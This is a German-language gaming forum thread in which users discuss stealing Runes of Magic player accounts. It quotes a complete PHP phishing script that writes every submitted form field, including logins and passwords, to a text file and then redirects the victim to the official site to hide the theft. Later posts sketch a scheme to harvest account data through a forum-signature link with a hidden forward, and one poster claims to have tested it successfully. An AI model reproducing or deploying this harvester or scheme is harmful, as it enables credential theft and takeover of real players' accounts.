jo.. kaum zu glauben aber wahr! ich bin irgendwie immer noch schockiert und mein kopf qualmt auch aber es klappt echt... echt mies !
Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?Quote:
Leider warst du dir nicht zu 1001% sicher, hatte es wolleboii auch nun genauer erklärt wieso das überhaupt geht.
Wo bleibt mein obligatorischer Kuchen? :bandit:
Quote:
PHP Code:<?php
header ('Location: http://www.runesofmagic.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Vielleicht hättest du mal dir auch die ersten Beiträge durchlesen können, was ich erklärt habe war kein Phising oder sonst was, sondern eine alternative Methode. Lesen Jungs. :facepalm:Quote:
Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?
Du bekommst dein Kuchen wenn du allen von uns erklären kannst wieso das überhaupt geht. Vorher solltest du den Ball flach halten.
Das was du wahrscheinlich meinst hat nichts direkt mit dem Thema/Video zu tun. In dem Video wird dargestellt wie man sich eine Phishing-Website bastelt bzw. ganz einfach mit erstellt und die Eingaben nach dem Drücken auf den "Submit"-Button in eine neu erstellte Textdatei schreibt. Danach wird man forwarded/weitergeleitet auf runesofmagic.com damit man denkt man hat das alles grad auf der offiziellen Runes of Magic Page gemacht.
so wie ich das verstanden hab hat das nichts mit cookies zu tun...Quote:
Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?
Mit einer Phising-Page die Daten zu ergattern ist einfach, wirklich effizient dafür nicht, immerhin ist ja nicht jeder so blöd und checkt nicht falls z.B. die URL ne falsche ist.Quote:
so wie ich das verstanden hab hat das nichts mit cookies zu tun...
wenn du die daten hast, kannst du dich auf der frogster seite einloggen und die daten ändern, so isset doch am einfachsten
:handsdown: Endlich jemand der die Sache versteht, ja genau so könnte man das machen. Es funktioniert auch. Habs mit Deset und Wolleboii probiert.Quote:
Mit einer Phising-Page die Daten zu ergattern ist einfach, wirklich effizient dafür nicht, immerhin ist ja nicht jeder so blöd und checkt nicht falls z.B. die URL ne falsche ist.
Hingegen die Idee mit den Cookies ist nahezu brilliant. Man könnte z.B. einfach einen Link in seine RoM-Foren Signatur reinpacken, die führt dich dann zu irgend ner Seite z.B. Gildenhp. Dazwischen hast du aber nen selbergebastelten forward der die Acc-Daten einfach in ein Vorgegebenes Schema alá User1;Pw1, User2;Pw2 etc umändert.
Die große Frage ist jetzt eben ob das so einwandfrei klappt, nach Atheuz ja, nach den meisten anderen nein. Die anderen wissen nichtmal um was es geht.
Ich persönlich würd mich über ne kleine Demonstration von Atheuz freuen falls er/sie es überhaupt hingekriegt hat. Dafür würds von mir nen extra großen Kuchen, geschmückt mit lauter kleinen Thx geben ^^
Natürlich, ich bewerbe mich mal bei Frogster und sage ich helfe euch eure Server sicher zu machen.Quote:
danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^
wozu?Quote:
danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^